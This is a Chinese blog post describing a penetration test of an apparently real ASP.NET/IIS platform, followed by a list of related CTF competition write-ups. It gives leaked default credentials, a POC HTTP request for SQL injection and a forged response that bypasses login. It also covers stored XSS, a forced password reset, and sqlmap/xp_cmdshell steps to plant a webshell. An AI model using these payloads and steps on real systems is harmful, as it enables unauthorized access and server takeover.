记一次山东省某测试平台渗透测试

已于 2024-08-27 21:22:59 修改
阅读量330 收藏 1
点赞数 10
文章标签: 数据库 安全 sql .net
于 2024-08-27 21:08:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/141612028
版权

最近:

离开山东有段时间了,今天刚好有空就回头看看(意难平),搭建框架是WINDOWS+IIS+ASP.NET这个演示版上直接泄露了账号密码,admin/111111。

登录框先试一下SQL注入

SQL注入

 

bp抓包结果

开局就找了登录框SQL注入,先进后台看一下功能点

功能点不多,简单看了有SQL注入和存储型XSS

存储型XSS

弹窗成功

逻辑缺陷

IP+/pwd.aspx接口可以强制更改密码,勾选强制变更再点击更改可以直接更改密码 

 SQL注入的接口比较多

bp

 

POC :

GET /data/Ajax.aspx?method=jczl_list&flb=role&page=1&limit=20&fnumber=1%27&fname=1%27 HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/basedata/role_list.aspx?ModuleID=103&navtabid=a103&reporttitle=WNqUHWMgJmssXIvnsG6MfQ==&fwidth=456&fheight=360
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=becfwzplbak3eht1a11eqxsn; pfbs_Login_compid=1001
Connection: keep-alive

sqlmap结果

报错的时候已经泄露了绝对路径,加上windows+asp.net+xp_cmdshell可以直接getshell

 sqlmap写webshell

 先拿个shell

登录框逻辑缺陷 

登录框在验证上有问题,如果返回包没 密码不正确!就直接跳转后台

bp直接拦截返回包再修改返回包即可直接登录后台,可以使用下面的POC返回包

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
Set-Cookie: pfbs_Login_compid=1001; expires=Thu, 26-Sep-2024 13:14:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 27 Aug 2024 13:14:04 GMT
Content-Length: 0

摸金校尉-马
关注
22年山东省B-2网页渗透测试
panda.
05-10 687
首先这道题目就是ip/1找flag的题目,所以我们直接来看环境:这个题目直接使用抓包修改头部即可拿到flag我们接着看一道题目:这道题目一看就是xff我们直接使用curl来进行渗透:我们接着看下一个题目:在这种类似于ip/1这种题目中其实要把他想的简单一点没有那么复杂:直接在id中使用2’ or 1=1#直接出来flag。我们接着看下一个题目:还是这个界面还是post但是肯定还是有变化的:我们还是使用burp来看一下:比起上一道题目加了很多过滤。我们接着看下一个题目:发现是一个get,那我们直接在url上输
2020年山东省网络空间安全技能大赛Web 安全之综合渗透测试
forget_mt的博客
01-10 4786
任务环境说明: 服务器场景名称: 服务器场景操作系统:未知(关闭链接) 1.使用渗透机场景 Kali2.0 中的工具扫描服务器,通过扫描服务器得到 web 端口,登陆网站(网站路径为 IP/up),找到网站首页中的 Flag 并提交; url输入172.16.5.193/up/ 查看源码发现一个flag路径打开后得到flag flag:sacasceafvdbtsd 2.使用渗透机场景 windows7 访问服务其场景中的网站,通过上题给的信息 获取本题,并将本题中的 Flag 提交; 要
2024年山东省中职“网络安全”试题——B-3:Web安全之综合渗透测试
依旧是寻觅
01-01 797
1. 使用渗透机场景Kali中的工具扫描服务器,通过扫描服务器得到web端口,登陆网站(网站路径为IP/up),找到网站首页中的Flag并提交; 2. 使用渗透机场景windows7访问服务其场景中的网站,通过上题给的信息获取本题,并将本题中的Flag提交; 3. 使用渗透机场景windows7根据第二题的入口继续访问服务器本题场景,通过提示得到Flag并提交; 4. 使用渗透机场景windows7根据第三题入口继续访问服务器的本题场景,通过提示联系前两题上传特定文件名得到Flag并提交; 5. 使用渗透机
面试经验分享 | 渗透测试工程师(实习岗)
2301_80127209的博客
06-24 1333
Webshell是黑客经常使用的一种**恶意脚本,常见的webshell编写语言为asp、jsp和php。
2021年山东省中职组网络安全省赛B模块windows渗透解析
qq_57147160的博客
12-13 6254
B-10任务十:Windows操作系统渗透测试任务环境说明:●服务器场景:Server2(封闭链接)●服务器场景操作系统:Windows7 1.通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交; 首先第一道题目就非常简单,直接使用nmap -sV 版本扫描进行得出flag: Flag:23 2.通过本地PC中渗透测试平台Kali对服务器场景
2021年山东省中职组“网络空间安全”B模块windows渗透(解析)
Jay
07-22 951
渗透测试,是一项在计算机系统上进行的授权模拟攻击,旨在对其安全性进行评估,是为了证明网络防御按照预期计划正常运行而提供的一种机制。”
2022年中职组网络安全山东省省赛题库后门安装与渗透题目解析
qq_57147160的博客
03-01 6851
B-2任务二:Rootkit后门的利用任务环境说明:●服务器场景:Server2(封闭靶机)●服务器场景操作系统:未知 通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描11/25渗透测试,并将该操作显示结果中SSH服务版本信息字符串作为FLAG提交; 2.通过本地PC中渗透测试平台Kali对服务器场景进行SSH暴力破解,将破解成功的密码作为FLAG提交;(用户名:root,字典文件/usr/share/wordlists/dirb/small.txt) 3
2021山东省职业院校技能大赛“网络空间安全”赛题及赛题解析(超详细)
Aluxian_的博客
12-02 4837
2021年中职组“网络空间安全”赛项山东省竞赛任务书模块 A 基础设施设置与安全加固(200分)模块B 网络安全事件响应、数字取证调查和应用安全(400分)模块C CTF夺旗-攻击(200分)模块D CTF夺旗-防御(200分) 山东省竞赛任务书 一、竞赛时间 上午 8:00-11:00 考察模块A.B 下午13:00-16:00考察模块C.D 共计6小时 模块编号 模块名称 竞赛时间(小时) 权值 A 基础设施设置与安全加固 1.5 20% B 网络安全事件响应、数字取证调查和应用安全 1.5 40%
山东省科协和山东省计算机协会信息奥赛夏令营活动,山东省信息学奥赛活动的开展情况介绍.doc...
weixin_39934302的博客
07-31 479
山东省信息学奥赛活动的开展情况介绍立足普及 迈向提高全国信息学奥林匹克竞赛(National Olympiad in Informatics,NOI))是一项面向全国青少年的信息学竞赛和普及活动,旨在激发中学生在计算机科学和信息技术方面的兴趣,向中学生普及计算机科学知识,培养他们的逻辑思维能力,给那些有才华的学生提供相互交流和学习的机会,通过竞赛和相关的活动培养和选拔优秀的计算机后备专业人才,给...
山东省曲阜市第一中学2019届高三理综上学期11月份阶段性测试试题
08-05
- 植物细胞的渗透作用:实验①探讨了植物细胞的失水和吸水,这涉及到细胞的原生质层以及渗透压的概念。 - 色素提取与分离:实验②涉及色素的提取(如使用酒精)和分离(如通过纸层析法)。 - 有丝分裂观察:实验...
山东省潍坊市第一中学2020届高三生物下学期3月测试试题202003240156
09-09
渗透现象实验中半透膜的作用;探究光合作用时需要控制的变量,如光照强度和温度;以及影响色素提取和分离实验的因素。 4. 遗传学与减数分裂:雄蜂的减数分裂和有丝分裂特点,包括DNA含量的变化、同源染色体的行为...
山东省济宁市育才中学2019_2020学年高二地理下学期周末定时测试试题一202005110122
09-09
15. **水文地质与生态保护** - “绿水青山”工程可能改变地表水的渗透和径流,具体影响取决于地层的渗透性和降雨分布。 16. **水资源管理与生态保护** - 结合图文材料,分析节水灌溉技术(如膜下滴灌)对水源利用和...
实用SQL小总结
UntifA的博客
09-29 1324
SQL
【2024】基于mysqldump的数据备份与恢复
最新发布
皮皮的博客
10-03 328
本文录了mysqldump对于MySQL数据库的备份与恢复用法
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 535
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 720
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 257
Wintergrasp 冬拥湖 120 VS 120
[EBPF] 实时捕获DM数据库是否存在SQL阻塞
飞奔的屎壳郎
09-27 1011
名称版本linux版本(centos8.5)DM88.1.4.27python利用ebpf技术在不登录数据库的情况下,通过对数据库的函数添加钩子,实时的对数据库是否存在阻塞判断现有的监控逻辑都是新建数据库用户执行SQL语句来判断阻塞情况,告警的实时性取决于监控的周期频率,而使用ebpf技术能够解决这个痛点ebpf有多种实现方式,这里便于理解测试的话 使用python语言内置c语言的形式进行了说明。涉及到生产环境应该是使用go语言或者c语言去做能够有效避免源码泄露等问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值